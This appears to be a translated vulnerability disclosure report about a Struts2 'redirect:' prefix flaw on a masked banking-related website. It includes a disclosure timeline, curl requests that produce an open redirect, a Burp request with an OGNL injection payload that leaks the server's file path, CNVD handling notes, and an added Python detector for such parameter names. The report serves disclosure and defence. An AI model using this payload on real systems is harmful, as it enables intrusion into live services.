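2015-11-19: Details reported to the vendor, awaiting vendor handling
2015-11-24: Vendor has confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public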
As the title says.

1.
curl http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976\?redirect:/xxoo
Returns a blank page.

2.
curl http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 -d "redirect:/xxoo=1"
Returns a blank page.

3.
curl -i http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 -F "redirect:/xxoo=1"
HTTP/1.1 100 Continue

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 Nov 2015 08:42:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7i DAV/2
Location: http://**.**.**.**/xxoo
Transfer-Encoding: chunked
Content-Type: text/html

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://**.**.**.**/xxoo">http://**.**.**.**/xxoo</a>.</p> // Redirected here; the target address is xxoo
</body></html>
The server answered with a 302 redirect.

Submit the request directly with Burp:
POST /integral/web/productDetail/detailProduct.action?iProduct=17976 HTTP/1.1
User-Agent: curl/7.33.0
Host: **.**.**.**
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 234
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987

--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------4a606c052a893987--
The path obtained is:
/cnbs/cnbspt_ms1/eosdomain/applications/eos4wl/default.war
For the whole process, see https://**.**.**.**/bugs/wooyun-2015-0147301
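
The three requests above differ only in where the redirect: parameter name is carried (query string, urlencoded body, multipart body). As an added example, not part of the original report or of any vendor code, the Python check below extracts parameter names from all three locations and flags those that start with a Struts2 mapper prefix. The host bank.example, the boundary XBOUND and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter-name prefixes that Struts2's DefaultActionMapper treats specially.
# The report exercises only "redirect:"; the other two are listed as related prefixes.
PREFIXES = ("redirect:", "redirectAction:", "action:")
OGNL_MARKER = re.compile(r"[$%]\{")  # start of a ${...} or %{...} expression

def multipart_names(body: bytes, boundary: str):
    """Yield field names from a multipart/form-data body."""
    for part in body.split(b"--" + boundary.encode()):
        head = part.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        # Greedy up to the last quote on the header line, because a hostile
        # name can itself contain double quotes (it may over-capture a filename).
        m = re.search(r'(?im)^content-disposition:.*?\bname="(.*)"', head)
        if m:
            yield m.group(1)

def param_names(url: str, content_type: str = "", body: bytes = b""):
    """Collect parameter names from the query string and the request body."""
    names = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    ctype = content_type.lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        names += [k for k, _ in parse_qsl(body.decode("latin-1"), keep_blank_values=True)]
    elif ctype.startswith("multipart/form-data"):
        m = re.search(r'(?i)boundary="?([^";]+)', content_type)
        if m:
            names += multipart_names(body, m.group(1))
    return names

def findings(url: str, content_type: str = "", body: bytes = b""):
    """Return (name, kind) for every parameter name carrying a Struts2 prefix."""
    return [(n, "ognl" if OGNL_MARKER.search(n) else "prefix")
            for n in param_names(url, content_type, body) if n.startswith(PREFIXES)]

# Constructed sample requests modelled on the three curl calls in the report.
URL = "http://bank.example/integral/web/productDetail/detailProduct.action?iProduct=17976"
FORM = "application/x-www-form-urlencoded"
MULTI = "multipart/form-data; boundary=XBOUND"

def multipart(name: str) -> bytes:
    return (f'--XBOUND\r\nContent-Disposition: form-data; name="{name}"'
            "\r\n\r\n1\r\n--XBOUND--\r\n").encode()

if __name__ == "__main__":
    print(findings(URL + "?redirect:/xxoo"))                   # step 1
    print(findings(URL, FORM, b"redirect:/xxoo=1"))            # step 2
    print(findings(URL, MULTI, multipart("redirect:/xxoo")))   # step 3
```

In step 1 the second "?" makes redirect:/xxoo part of the iProduct value, so no parameter is actually named redirect: and nothing is flagged; steps 2 and 3 are flagged alike, which is the property a filter needs if it is to cover multipart bodies as well as urlencoded ones.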
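Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-11-24 15:34
CNVD has confirmed and reproduced the issue described. It has been passed to CNCERT to notify the banking-sector IT regulatory authority, which will coordinate follow-up handling with the organization managing the website; it has also been forwarded by CNCERT to the Fujian sub-center.
None yet.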